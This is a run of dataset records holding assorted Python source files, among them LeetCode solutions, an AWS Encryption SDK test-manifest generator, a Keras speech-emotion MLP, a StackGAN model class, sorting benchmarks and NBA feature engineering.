IN_ANR:\n ANRs[-1] += o + '\\n'\n elif state is IN_FC:\n FCs[-1] += o + '\\n'\n else:\n assert state is IDLE\n if o.startswith('// CRASH'):\n state = IN_FC\n FCs.append(o + '\\n')\n elif o.startswith('// NOT RESPONDING'):\n state = IN_ANR\n ANRs.append(o + '\\n')\n if len(FCs) is not 0:\n android.log.warning(TAG, '%d force closes detected' % len(FCs))\n f=open(a.log.log_filename('FCs.txt'),'wb')\n for FC in FCs: f.write(FC + '\\n')\n f.close()\n if len(ANRs) is not 0:\n android.log.warning(TAG, '%d ANRs detected' % len(ANRs))\n f=open(a.log.log_filename('ANRs.txt'),'wb')\n for ANR in ANRs: f.write(ANR + '\\n')\n f.close()\n del a.internal.crashdetect\n","sub_path":"apython/extras/plugins/crashdetect.py","file_name":"crashdetect.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"634371855","text":"#coding=utf-8\n\nimport unittest\n\n\n\"\"\"\n\nLongest Substring Without Repeating Characters\n\nGiven a string, find the length of the longest substring without repeating characters.\nFor example, the longest substring without repeating letters for \"abcabcbb\" is \"abc\", which the length is 3.\nFor \"bbbbb\" the longest substring is \"b\", with the length of 1.\n\nHash Table Two Pointers String\nHide Similar Problems (H) Longest Substring with At Most Two Distinct Characters\n\n\n\"\"\"\n\n\nclass Solution:\n # @param {string} s\n # @return {integer}\n def lengthOfLongestSubstring(self, s): # ref idea, use dict for position !!!\n if not s:\n return 0\n pos = {}\n result = 0\n i = 0\n for j in range(len(s)):\n char = s[j]\n if char not in pos or pos[char] < i:\n pos[char] = j\n result = max(result, j-i+1)\n else:\n char_pos = pos[char]\n pos[char] = j # don't forget to update new pos of char here\n i = char_pos + 1\n return result\n\n def lengthOfLongestSubstring_wrongonref(self, s): # ref idea, use dict for position !!!, wrong for case2\n if not s:\n return 0\n pos = {}\n result = 0\n i = 0\n for j in range(len(s)):\n char = s[j]\n if char not in pos:\n pos[char] = j\n result = max(result, j-i+1)\n else:\n char_pos = pos[char]\n i = char_pos + 1\n return result\n\n\n def lengthOfLongestSubstring4(self, s): # good self idea, 20170517\n \"\"\"\n rev keep non repeating character\n :param s: \n :return: \n \"\"\"\n if not s:\n return 0\n i, j = 0, 0\n rev = {}\n result = 0\n while j < len(s):\n char = s[j]\n if char not in rev:\n rev[char] = 1\n result = max(result, j-i+1)\n else:\n rev[char] += 1\n while s[i] != char:\n del rev[s[i]]\n i += 1\n rev[char] -= 1\n i += 1\n j += 1\n return result\n\n\n def lengthOfLongestSubstring3(self, s): # can be simpler , 20170517\n # write your code here\n if not s:\n return 0\n i, j = 0, 0\n rev = {}\n result = 0\n while j < len(s):\n char = s[j]\n if char not in rev:\n rev[char] = 1\n j += 1\n result = max(result, j-i)\n continue\n else:\n rev[char] += 1\n while True:\n tmp = s[i]\n rev[tmp] -= 1\n i += 1\n if rev[tmp] == 0:\n del rev[tmp]\n if rev[char] <= 1:\n break\n j += 1 # don't forget this , otherwise wrong\n return result\n\n def lengthOfLongestSubstring1(self, s):\n maxlen = 0\n subStr = ''\n tail = 0\n for head in xrange(len(s)):\n if s[head] not in subStr:\n subStr += s[head]\n else:\n maxlen = max(maxlen, len(subStr))\n while s[tail] != s[head]:\n tail += 1\n tail += 1\n subStr = s[tail: head+1]\n return max(maxlen, len(subStr))\n\n def lengthOfLongestSubstring2(self, s):\n maxlen = 0\n subDict = {}\n lastRepeat = -1\n for head in xrange(len(s)):\n if s[head] not in subDict:\n subDict[s[head]] = head\n else:\n if lastRepeat < subDict[s[head]]:\n maxlen = max(maxlen, head - 1 - lastRepeat)\n lastRepeat = subDict[s[head]]\n subDict[s[head]] = head\n else:\n subDict[s[head]] = head\n return max(maxlen, len(s) - 1 - lastRepeat)\n\nclass SolutionTester(unittest.TestCase):\n def setUp(self):\n self.sol = Solution()\n\n def test_case1(self):\n nums = \"aaaa\"\n answer = 1\n result = self.sol.lengthOfLongestSubstring(nums)\n self.assertEqual(answer, result)\n\n def test_case2(self):\n nums = \"an++--viaj\"\n answer = 5\n result = self.sol.lengthOfLongestSubstring(nums)\n self.assertEqual(answer, result)\n\n\ndef main():\n suite = unittest.TestLoader().loadTestsFromTestCase(SolutionTester)\n unittest.TextTestRunner(verbosity=2).run(suite)\n\nif __name__ == \"__main__\":\n main()\n\n\"\"\"\n\nclass Solution(object):\n def lengthOfLongestSubstring(self, s):\n ans = 0\n # left用于记录合法的左边界位置,last用于记录字符上一次出现的位置\n left = 0\n last = {}\n for i in range(len(s)):\n # 子串中出现重复字符,变更left至上一次s[i]出现位置之后,使得子串合法\n if s[i] in last and last[s[i]] >= left:\n left = last[s[i]] + 1\n last[s[i]] = i\n ans = max(ans, i - left + 1)\n return ans\n \n\n\"\"\"\n\n# if __name__ == '__main__':\n# sol = Solution()\n# s = 'aab'\n# #s = 'eee'\n# #s = \"qwnfenpglqdq\"\n# print sol.lengthOfLongestSubstring(s)","sub_path":"freq/longest_substring_without_repeating_characters.py","file_name":"longest_substring_without_repeating_characters.py","file_ext":"py","file_size_in_byte":5348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"369050269","text":"# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You\n# may not use this file except in compliance with the License. A copy of\n# the License is located at\n#\n# http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is\n# distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF\n# ANY KIND, either express or implied. See the License for the specific\n# language governing permissions and limitations under the License.\n#\n# Only Python 3.7+ compatibility is guaranteed.\n\nimport argparse\nimport json\nimport os\nimport sys\nfrom urllib.parse import urlunparse\n\nfrom awses_message_encryption_utils import (\n ALGORITHM_SUITES,\n ENCRYPTION_CONTEXTS,\n FRAME_SIZES,\n PLAINTEXTS,\n RAW_RSA_PADDING_ALGORITHMS,\n _keys_for_algorithm,\n _keys_for_decryptval,\n _keys_for_type,\n build_tests,\n)\n\nMANIFEST_VERSION = 2\n\n\ndef _tests_for_type(type_name, tests):\n \"\"\"Filter encrypt manifest keys by type.\n\n :param str type_name: Key type name for which to filter\n :param dict keys: Parsed keys manifest\n \"\"\"\n for _name, test in tests[\"tests\"].items():\n for master_key in test[\"master-keys\"]:\n if master_key[\"type\"] == type_name:\n yield test\n break\n\n\ndef _tests_for_algorithm(algorithm_name, tests):\n \"\"\"Filter encrypt manifest keys by algorithm name.\n\n :param str algorithm_name: Key algorithm name for which to filter\n :param dict tests: Full message encrypt manifest to test\n \"\"\"\n for _name, test in tests[\"tests\"].items():\n for master_key in test[\"master-keys\"]:\n if master_key[\"key\"].startswith(algorithm_name + \"-\"):\n yield test\n break\n\n\ndef _test_manifest(keys_filename, manifest):\n \"\"\"Test that the manifest is actually complete.\n\n :param str keys_file: Name of file containing the keys manifest\n :param dict manifest: Full message encrypt manifest to test\n \"\"\"\n with open(keys_filename, \"r\") as keys_file:\n keys = json.load(keys_file)\n\n aes_key_count = len(list(_keys_for_algorithm(\"aes\", keys)))\n black_hole_aes_key_count = len(\n [value for value in list(_keys_for_algorithm(\"aes\", keys)) if value in list(_keys_for_decryptval(False, keys))]\n )\n aes_key_combination_count = (\n aes_key_count\n - black_hole_aes_key_count\n + ((aes_key_count - black_hole_aes_key_count) * black_hole_aes_key_count)\n )\n\n cycleable_rsa_key_count = 0\n black_hole_rsa_key_count = 0\n for _name, rsa_key in _keys_for_algorithm(\"rsa\", keys):\n if rsa_key[\"encrypt\"]:\n if rsa_key[\"decrypt\"]:\n cycleable_rsa_key_count += 1\n else:\n black_hole_rsa_key_count += 1\n\n cycleable_rsa_combination_count = cycleable_rsa_key_count * len(RAW_RSA_PADDING_ALGORITHMS)\n black_hole_rsa_combination_count = cycleable_rsa_combination_count * black_hole_rsa_key_count\n rsa_key_combination_count = cycleable_rsa_combination_count + black_hole_rsa_combination_count\n\n kms_key_count = len(list(_keys_for_type(\"aws-kms\", keys)))\n black_hole_kms_key_count = len(\n [value for value in list(_keys_for_type(\"aws-kms\", keys)) if value in list(_keys_for_decryptval(False, keys))]\n )\n kms_key_combination_count = (\n kms_key_count\n - black_hole_kms_key_count\n + ((kms_key_count - black_hole_kms_key_count) * black_hole_kms_key_count)\n )\n\n aes_test_count = len(list(_tests_for_algorithm(\"aes\", manifest)))\n rsa_test_count = len(list(_tests_for_algorithm(\"rsa\", manifest)))\n kms_test_count = len(list(_tests_for_type(\"aws-kms\", manifest)))\n\n iterations = len(ALGORITHM_SUITES) * len(FRAME_SIZES) * len(ENCRYPTION_CONTEXTS)\n expected_aes_test_count = aes_key_combination_count * iterations\n expected_rsa_test_count = rsa_key_combination_count * iterations\n expected_kms_test_count = kms_key_combination_count * iterations\n\n if not all(\n [\n 0 < expected_aes_test_count == aes_test_count,\n 0 < expected_rsa_test_count == rsa_test_count,\n 0 < expected_kms_test_count == kms_test_count,\n ]\n ):\n raise ValueError(\n \"Unexpected test count: \\nAES: {aes}\\nRSA: {rsa}\\nAWS-KMS: {kms}\".format(\n aes=\"Expected: {expected} Actual: {actual}\".format(\n expected=expected_aes_test_count, actual=aes_test_count\n ),\n rsa=\"Expected: {expected} Actual: {actual}\".format(\n expected=expected_rsa_test_count, actual=rsa_test_count\n ),\n kms=\"Expected: {expected} Actual: {actual}\".format(\n expected=expected_kms_test_count, actual=kms_test_count\n ),\n )\n )\n\n\ndef build_manifest(keys_filename):\n \"\"\"Build the test-case manifest which directs the behavior of cross-compatibility clients.\n\n :param str keys_file: Name of file containing the keys manifest\n \"\"\"\n with open(keys_filename, \"r\") as keys_file:\n keys = json.load(keys_file)\n\n keys_path = \"/\".join(keys_filename.split(os.path.sep))\n keys_uri = urlunparse((\"file\", keys_path, \"\", \"\", \"\", \"\"))\n\n return {\n \"manifest\": {\"type\": \"awses-encrypt\", \"version\": MANIFEST_VERSION},\n \"keys\": keys_uri,\n \"plaintexts\": PLAINTEXTS,\n \"tests\": dict(build_tests(keys)),\n }\n\n\ndef main(args=None):\n \"\"\"Entry point for CLI\"\"\"\n parser = argparse.ArgumentParser(description=\"Build an AWS Encryption SDK encrypt message manifest.\")\n parser.add_argument(\"--human\", action=\"store_true\", help=\"Print human-readable JSON\")\n parser.add_argument(\"--keys\", required=True, help=\"Keys manifest to use\")\n\n parsed = parser.parse_args(args)\n\n manifest = build_manifest(parsed.keys)\n\n _test_manifest(parsed.keys, manifest)\n\n kwargs = {}\n if parsed.human:\n kwargs[\"indent\"] = 4\n\n return json.dumps(manifest, **kwargs)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"features/0003-awses-message-encryption-generate.py","file_name":"0003-awses-message-encryption-generate.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"441159586","text":"'''the function within'''\ndef domath():\n '''gets input and does the equations the prints it'''\n var_a = float(input())\n var_b = float(input())\n var_c = float(input())\n var_d = float(input())\n\n\n result_1 = func_f(func_f(var_a))\n result_2 = func_g(func_f(var_a - var_b))\n result_3 = func_h(func_f(var_a+var_b), func_f(var_a+var_c), func_g(func_f(var_d**2)))\n#last one too long, had to break it up to parts\n subresult_1 = func_h(func_f(var_a + var_b), func_f(var_a-var_c), func_g(func_f(var_d**2)))\n subresult_2 = func_g(func_f(var_a-var_b))\n subresult_3 = func_f(func_f(func_f(func_f(func_f(var_c)))))\n subresult_4 = var_d**8\n#here comes the boss\n result_4 = func_i(subresult_1, subresult_2, subresult_3, subresult_4)\n#printing process\n print(result_1)\n print(result_2)\n print(result_3)\n print(result_4)\n\n\ndef func_f(varx):\n '''the function f'''\n return 2*varx\n\ndef func_g(varx):\n '''the function g'''\n return (3*varx**4) - (varx**3) + (2*varx**2) + 10\n\ndef func_h(varx, vary, varz):\n '''the function h'''\n return ((varz+varx)**2) - (varx*vary) + (vary**2)\n\ndef func_i(vara, varb, varc, vard):\n '''the function i'''\n return ((vara**2)+(varb**2)-(varc**2))/((vard**2)-(2*vara*vard)+(2*vara))\n\n\n\ndomath()\n","sub_path":"22_aug/thefuncwithin.py","file_name":"thefuncwithin.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"20440937","text":"# Features:\n# 62 features - 26 MFCCs (mean) and 26 MFCCs (standard deviation), 7 spectral contrast (mean), 2 poly features (mean), and 1 RMS (mean).\n#\n#*************************************************************************************\n\nimport pandas as pd\nimport math\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport librosa as rosa\nimport os\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\nimport tensorflow.keras as keras\nfrom sklearn.utils import resample\nfrom tensorflow.keras.callbacks import LearningRateScheduler\n\n\n# Initialize timer\nt_1 = time.perf_counter()\n\n# Set the random seeds for replicating results over multiple runs.\nnp.random.seed(0)\ntf.random.set_seed(0)\n\n# Import dataframe/dataset into an instance/object 'df' using Pandas. Use first row as column header and first column as row header!\ndf = pd.read_csv(r'/home/r_m727/All_Files/Corpus/Simulated/RAVDESS+TESS+CREMA-D/RAVDESS+TESS+CREMA-D_Librosa_Clean.csv', header=0, index_col=0)\n\n# Rename target labels.\ndf['Emotion'].replace({\"Neutral\" : 1.0, \"Happy\" : 2.0, \"Sad\" : 3.0, \"Angry\" : 4.0, \"Fearful\" : 5.0, \"Disgust\" : 6.0, \"Surprised\" : 7.0}, inplace=True)\n\n# Take data samples of each class from dataframe into separate dataframes.\ndf_happy = df.loc[df.Emotion==2.0]\ndf_sad = df[df.Emotion==3.0]\ndf_angry = df[df.Emotion==4.0]\ndf_fearful = df[df.Emotion==5.0]\ndf_disgust = df[df.Emotion==6.0]\ndf_neutral = df[df.Emotion==1.0]\ndf_surprised = df[df.Emotion==7.0]\n\n# Join only the majority classes, leaving out Neutral and Surprised.\ndf_less = pd.concat([df_happy, df_sad, df_angry, df_fearful, df_disgust])\n\n# Extract labels of majority classes.\ny_less = df_less.iloc[0:9315, 62].values\n# Extract features of majority classes.\nX_less = df_less.iloc[0:9315, list(range(62))].values\nprint(y_less)\n\n# Split and stratify majority class samples for training and testing.\nX_train_temp_less, X_test_less, y_train_temp_less, y_test_less = train_test_split(X_less, y_less, test_size=931, random_state=0, stratify=y_less) # training split = 90%, test split = 10%\n\n# Further split and stratify majority class training samples for training data for training and validating.\nX_train_less, X_val_less, y_train_less, y_val_less = train_test_split(X_train_temp_less, y_train_temp_less, test_size=931, random_state=0, stratify=y_train_temp_less) # training split = 80%, validation split = 10%\n\n# Take minority data samples from dataframe to array\nneutral_array = df_neutral.to_numpy()\nsurprised_array = df_surprised.to_numpy()\n\n# Shuffle the data samples of minority class\nnp.random.shuffle(neutral_array)\nnp.random.shuffle(surprised_array)\n\n# Split minority class Neutral in 80:10:10 ratio.\ntrain_neutral = neutral_array[0:1267, :]\nval_neutral = neutral_array[1267:1425, :]\ntest_neutral = neutral_array[1425:1583, :]\n\n# Resample Neutral data to match majority class samples.\ntrain_neutral_resampled = resample(train_neutral, n_samples=1491, replace=True, random_state=0)\nval_neutral_resampled = resample(val_neutral, n_samples=186, replace=True, random_state=0)\ntest_neutral_resampled = resample(test_neutral, n_samples=186, replace=True, random_state=0)\n\n# Separate features and target labels for Neutral data.\nX_train_neutral = train_neutral_resampled[:, 0:62]\nX_val_neutral = val_neutral_resampled[:, 0:62]\nX_test_neutral = test_neutral_resampled[:, 0:62]\ny_train_neutral = train_neutral_resampled[:, 62]\ny_val_neutral = val_neutral_resampled[:, 62]\ny_test_neutral = test_neutral_resampled[:, 62]\n\n# Split minority class Surprised in 80:10:10 ratio.\ntrain_surprised = surprised_array[0:474, :]\nval_surprised = surprised_array[474:533, :]\ntest_surprised = surprised_array[533:592, :]\n\n# Resample Surprised data to match majority class samples.\ntrain_surprised_resampled = resample(train_surprised, n_samples=1491, replace=True, random_state=0)\nval_surprised_resampled = resample(val_surprised, n_samples=186, replace=True, random_state=0)\ntest_surprised_resampled = resample(test_surprised, n_samples=186, replace=True, random_state=0)\n\n# Separate features and target labels for Surprised data.\nX_train_surprised = train_surprised_resampled[:, 0:62]\nX_val_surprised = val_surprised_resampled[:, 0:62]\nX_test_surprised = test_surprised_resampled[:, 0:62]\ny_train_surprised = train_surprised_resampled[:, 62]\ny_val_surprised = val_surprised_resampled[:, 62]\ny_test_surprised = test_surprised_resampled[:, 62]\n\n# Join upsampled minority data samples with majority data samples.\nX_train_almost = np.concatenate((X_train_less, X_train_neutral), axis=0)\nX_train = np.concatenate((X_train_almost, X_train_surprised), axis=0)\nX_val_almost = np.concatenate((X_val_less, X_val_neutral), axis=0)\nX_val = np.concatenate((X_val_almost, X_val_surprised), axis=0)\nX_test_almost = np.concatenate((X_test_less, X_test_neutral), axis=0)\nX_test = np.concatenate((X_test_almost, X_test_surprised), axis=0)\ny_train_almost = np.concatenate((y_train_less, y_train_neutral), axis=0)\ny_train = np.concatenate((y_train_almost, y_train_surprised), axis=0)\ny_val_almost = np.concatenate((y_val_less, y_val_neutral), axis=0)\ny_val = np.concatenate((y_val_almost, y_val_surprised), axis=0)\ny_test_almost = np.concatenate((y_test_less, y_test_neutral), axis=0)\ny_test = np.concatenate((y_test_almost, y_test_surprised), axis=0)\n\n\nmean_vals = np.mean(X_train, axis=0)\nstd_val = np.std(X_train, axis=0)\n\n# Standardize the inputs\nX_train_centered = (X_train - mean_vals)/std_val\nX_val_centered = (X_val - mean_vals)/std_val\nX_test_centered = (X_test - mean_vals)/std_val\n\ndel X_train, X_val, X_test, X_train_temp_less, y_train_temp_less\n\nprint(X_train_centered.shape, y_train.shape)\nprint(X_val_centered.shape, y_val.shape)\nprint(X_test_centered.shape, y_test.shape)\n\n\n\n# One-Hot Encode the classes\ny_train_onehot = keras.utils.to_categorical(y_train)\ny_val_onehot = keras.utils.to_categorical(y_val)\ny_test_onehot = keras.utils.to_categorical(y_test)\n\n# Create an object/instance 'model' for the 'Sequential()' class.\nmodel = keras.models.Sequential()\nmodel.add(\n\tkeras.layers.Dense( units=105,\n\t\t\t\tinput_dim=X_train_centered.shape[1],\n\t\t\t\tkernel_initializer='glorot_uniform',\n\t\t\t\tbias_initializer='zeros', \n\t\t\t\tactivation='relu'))\n\nmodel.add(\n keras.layers.Dropout(0.30))\n\nmodel.add(\n\tkeras.layers.Dense( units=62,\n\t\t\t\tinput_dim=105,\n\t\t\t\tkernel_initializer='glorot_uniform',\n\t\t\t\tbias_initializer='zeros', \n\t\t\t\tactivation='relu'))\n\nmodel.add(\n keras.layers.Dropout(0.10))\n\nmodel.add(\n\tkeras.layers.Dense( units=y_train_onehot.shape[1],\n\t\t\t\tinput_dim=62,\n\t\t\t\tkernel_initializer='glorot_uniform',\n\t\t\t\tbias_initializer='zeros',\n\t\t\t\tactivation='softmax'))\n\n# Define the learning rate schedule. This can then be passed as the learning rate for the optimizer.\nlrate = keras.optimizers.schedules.InverseTimeDecay(initial_learning_rate=0.01, decay_steps=1000, decay_rate=0.8)\n\nadam_optimizer = keras.optimizers.Adam(\n\t\t\t\t\tlearning_rate=lrate) #1e-06 gave better result than default value 1e-07\n\nmodel.compile(optimizer=adam_optimizer,\n\t\t\t\t\tloss='categorical_crossentropy', metrics=[keras.metrics.CategoricalAccuracy(), keras.metrics.Precision(), keras.metrics.Recall()])\n\t\t\t\t\t\t \n\t\t\t\t\t\t\t# cross-entropy: fancy name for logistic regression \n\n# Train the MLP\nhistory = model.fit(X_train_centered, y_train_onehot, batch_size=16, epochs=50, verbose=2, validation_data=(X_val_centered, y_val_onehot))\n\nprint(history.history)\n\n# Evaluate the model on the test data using `evaluate`\nresults = model.evaluate(X_test_centered, y_test_onehot, batch_size=16)\nprint(\"test loss, test acc:\", results)\n\n\n# Plot the training and validation accuracies vs. epochs for the latest loop iteration\nfig = plt.figure()\nplt.plot(history.history['categorical_accuracy'])\nplt.plot(history.history['val_categorical_accuracy'])\nplt.title('MLP_Custom_Complete_Clean')\nplt.grid()\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\n#plt.show()\n# Save plot as PNG file\nfig.savefig('Accuracy_Curves_MLP_Librosa_Complete_Clean.png')\n\n# Plot the training and validation losses vs. epochs for the latest loop iteration\nfig = plt.figure()\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.title('MLP_Custom_Complete_Clean')\nplt.grid()\nplt.ylabel('loss')\nplt.xlabel('epoch')\nplt.legend(['train', 'validation'], loc='upper left')\n#plt.show()\n# Save plot as PNG file\nfig.savefig('Loss_Curves_MLP_Librosa_Complete_Clean.png')\n\nt_2 = time.perf_counter()\n\nprint('Time taken to execute code: % seconds' % (t_2-t_1))\n","sub_path":"MLP/MLP_Complete_results.py","file_name":"MLP_Complete_results.py","file_ext":"py","file_size_in_byte":8539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"322008683","text":"import torch.nn as nn\nimport torch\n\nfrom models import HybridCNN, Generator, Discriminator, ConditionAugmentation\n\n#param \n_cnn_dim = 1024\n_rnn_layers = 1\nclass StackGANWithEncoder(nn.Module):\n def __init__(self, alphasize, condition_dim, condition_embedding_dim, \n z_dim, image_dim, image_channel, cuda_enable, batch_size):\n super(StackGANWithEncoder, self).__init__()\n self.params = locals().copy()\n self.TextEncoder = HybridCNN(alphasize, condition_dim, \n _cnn_dim, _rnn_layers, cuda_enable=cuda_enable, batch_size=batch_size)\n self.CA = ConditionAugmentation(condition_dim, condition_embedding_dim, cuda_enable)\n self.generator = Generator(z_dim, condition_embedding_dim, image_dim, image_channel)\n self.discriminator = Discriminator(condition_embedding_dim, image_dim, image_channel)\n \n def forward_TextEnc(self, text_onehot):\n return self.TextEncoder(text_onehot)\n\n def forward_G(self, text_embedding):\n return self.generator(text_embedding)\n \n def forward_D(self, image):\n return self.discriminator(image)\n \n @staticmethod\n def weights_init(m):\n classname = m.__class__.__name__\n if classname.find('Conv') != -1:\n m.weight.data.normal_(0.0, 0.02)\n elif classname.find('BatchNorm') != -1:\n m.weight.data.normal_(1.0, 0.02)\n m.bias.data.fill_(0)\n elif classname.find('Linear') != -1:\n m.weight.data.normal_(0.0, 0.02)\n if m.bias is not None:\n m.bias.data.fill_(0.0)\n\n @staticmethod\n def save_model(model, save_path):\n save_dict = {\n \"params\":model.params,\n \"state_dict\":model.state_dict()\n }\n torch.save(save_dict,save_path)\n \n @staticmethod\n def load_model(self, load_path):\n load_dict = torch.load(load_path)\n model = StackGANWithEncoder(\n **(load_dict[\"params\"])\n )\n model.load_state_dict(load_dict[\"state_dict\"])\n \n\n","sub_path":"StackGANWithEncoder/StackGANWithEncoder.py","file_name":"StackGANWithEncoder.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"154006592","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Mike\n# @Contact : 597290963@qq.com\n# @Time : 2021/2/2 22:38\n# @File : Intersect.py\n\"\"\"\n给定两个数组,编写一个函数来计算它们的交集。\n\"\"\"\nfrom typing import List\n\n\nclass Intersect(object):\n\n def __init__(self):\n pass\n\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n \"\"\"\n 交集,排序双指针做法,可以适用于大数据集,将排序改为归并排序,双指针读取2个文件,对比\n\n 时间复杂度O(max(logN, logM, M + N))\n 空间复杂度O(min(N, M))\n :param nums1:\n :param nums2:\n :return:\n \"\"\"\n nums1.sort()\n nums2.sort()\n intersect_result = []\n left, right = 0, 0\n while left < len(nums1) and right < len(nums2):\n if nums1[left] < nums2[right]:\n left += 1\n elif nums1[left] == nums2[right]:\n intersect_result.append(nums1[left])\n left += 1\n right += 1\n else:\n right += 1\n\n return intersect_result\n\n def intersect1(self, nums1: List[int], nums2: List[int]) -> List[int]:\n \"\"\"\n 哈希表做法\n :param nums1:\n :param nums2:\n :return:\n \"\"\"\n hash_map = dict()\n for i in range(len(nums1)):\n hash_map.setdefault(nums1[i], 0)\n hash_map[nums1[i]] += 1\n\n intersect_result = []\n for j in range(len(nums2)):\n if hash_map.get(nums2[j], 0) > 0:\n intersect_result.append(nums2[j])\n hash_map[nums2[j]] -= 1\n if hash_map[nums2[j]] == 0:\n hash_map.pop(nums2[j])\n\n return intersect_result\n\n\nif __name__ == '__main__':\n print(Intersect().intersect(nums1=[4, 9, 5], nums2=[9, 4, 9, 8, 4]))\n","sub_path":"datastructure/hash_table/Intersect.py","file_name":"Intersect.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"492843238","text":"import numpy as np\n\n# gpu libraries\nimport torch\nfrom torchvision.utils import make_grid\n\ndef reconstruct(E,G,img):\n z,mu,logvar = E(img.view(1,3,32,32), False)\n return G(z).detach()\n\ndef viz_image_list(imglist, nrow=8):\n ims = torch.cat(imglist)\n grid = make_grid(ims, nrow=nrow)\n img_np = grid.numpy()\n return np.transpose(img_np, (1,2,0))\n\ndef interpolate(A, B, r, E, G, k=3, eps=0,nz=10):\n za, mua, logvara = E(A.view(1,3,32,32), False)\n zb, mub, logvarb = E(B.view(1,3,32,32), False)\n mu_int = mua*r + mub*(1-r)\n z_int = mu_int + torch.randn(1,nz,1,1)*eps\n return G(z_int).detach()\n\ndef interpolate_topk(A, B, r, E, G, k=3, eps=0, nz=10):\n za, mua, logvara = E(A.view(1,3,32,32), False)\n zb, mub, logvarb = E(B.view(1,3,32,32), False)\n mu_int = mua.clone()\n mu_int[:,0:k,0,0] = mua[:,0:k,0,0]*r + mub[:,0:k,0,0]*(1-r)\n z_int = mu_int + torch.randn(1,nz,1,1)*eps\n return G(z_int).detach()\n\ndef interpolate_botk(A,B,r,E,G,k=3, eps=0, nz=10):\n za, mua, logvara = E(A.view(1,3,32,32), False)\n zb, mub, logvarb = E(B.view(1,3,32,32), False)\n mu_int = mua.clone()\n mu_int[:,k:,0,0] = mua[:,k:,0,0]*r + mub[:,k:,0,0]*(1-r)\n z_int = mu_int + torch.randn(1,nz,1,1)*eps\n return G(z_int).detach()","sub_path":"viz_utils.py","file_name":"viz_utils.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"620029477","text":"from time import time\nimport os\n\ndef InsertionSort(A):\n\n inicio = time()\n\n for i in range(1, len(A)):\n j = i-1\n while j >= 0 and A[j] > A[j+1]:\n aux = A[j]\n A[j] = A[j+1]\n A[j+1] = aux\n j = j-1\n\n final = time()\n tiempo_ejecucion = (final-inicio)*1000\n\n return tiempo_ejecucion\n\n\n\n\n\n\nif __name__ == \"__main__\":\n \n cont = 0\n\n print('Insertion Sort Algorithm')\n\n for i in range(1000, 10000+1, 1000):\n cmd = \"python worst_case_script.py \" +str(i) \n os.system(cmd)\n cont += 1\n print('Archivo {} creado'.format(cont))\n\n\n dato1 = open('datos1_worst_case.txt', 'w')\n\n for i in range(1000, 10000+1, 1000):\n\n A = []\n file_name = 'worst_'+str(i)+'.txt'\n\n f = open(file_name, 'r')\n for x in f:\n A.append(int(x))\n\n tiempo_ejecucion = InsertionSort(A)\n dato1.write(str(i)+' '+str(tiempo_ejecucion)+'\\n')\n \n print('Archivo Creado')\n","sub_path":"Practica1/Parte1/Worst_case/Insertion-Sort.py","file_name":"Insertion-Sort.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"497117347","text":"import pandas as pd\nimport numpy as np\nimport pdb\n\n\ndef name_cleanup(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with labels names\n '''\n df.rename(index = str, columns={'home_point_spread':'label_h_point_spread','home_winner':'label_home_winner'}, inplace=True)\n return df\n\ndef shooting(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with shooting percentage calculated for home and away teams\n '''\n #FG %\n df['home_fgpct'] = df['home_fgmpg']/df['home_fgapg']\n df['away_fgpct'] = df['away_fgmpg']/df['away_fgapg']\n #3p%\n df['home_3ppct'] = df['home_3pmpg']/df['home_3papg']\n df['away_3ppct'] = df['away_3pmpg']/df['away_3papg']\n #FT%\n df['home_ftpct'] = df['home_ftmpg']/df['home_ftapg']\n df['away_ftpct'] = df['away_ftmpg']/df['away_ftapg']\n #EFG%\n df['home_efgpct'] = (df['home_fgmpg']+.5*df['home_3pmpg'])/df['home_fgapg']\n df['away_efgpct'] = (df['away_fgmpg']+.5*df['away_3pmpg'])/df['away_fgapg']\n #dropping unneeded columns\n df.drop(['home_fgmpg','away_fgmpg','home_3pmpg','away_3pmpg'], axis = 1,inplace=True)\n return df\n\ndef record(df):\n ''' Input: Dataframe with each row being a game and both home and away team season previous stats calculated\n Output: Dataframe in same form with W-L record stats calculated for home and away teams\n '''\n #calculating winning percentage for teams\n #Home team\n df['hometeam_wins'] = df['home_wins_home'] + df['away_games_home'] - df['away_losses_home']\n df['hometeam_games'] = df['home_games_home'] + df['away_games_home']\n df['hometeam_wp'] = df['hometeam_wins']/df['hometeam_games']\n df['hometeam_homewp'] = df['home_wins_home']/df['home_games_home']\n #Away team\n df['awayteam_wins'] = df['home_wins_away'] + df['away_games_away'] - df['away_losses_away']\n df['awayteam_games'] = df['home_games_away'] + df['away_games_away']\n df['awayteam_wp'] = df['awayteam_wins']/df['awayteam_games']\n 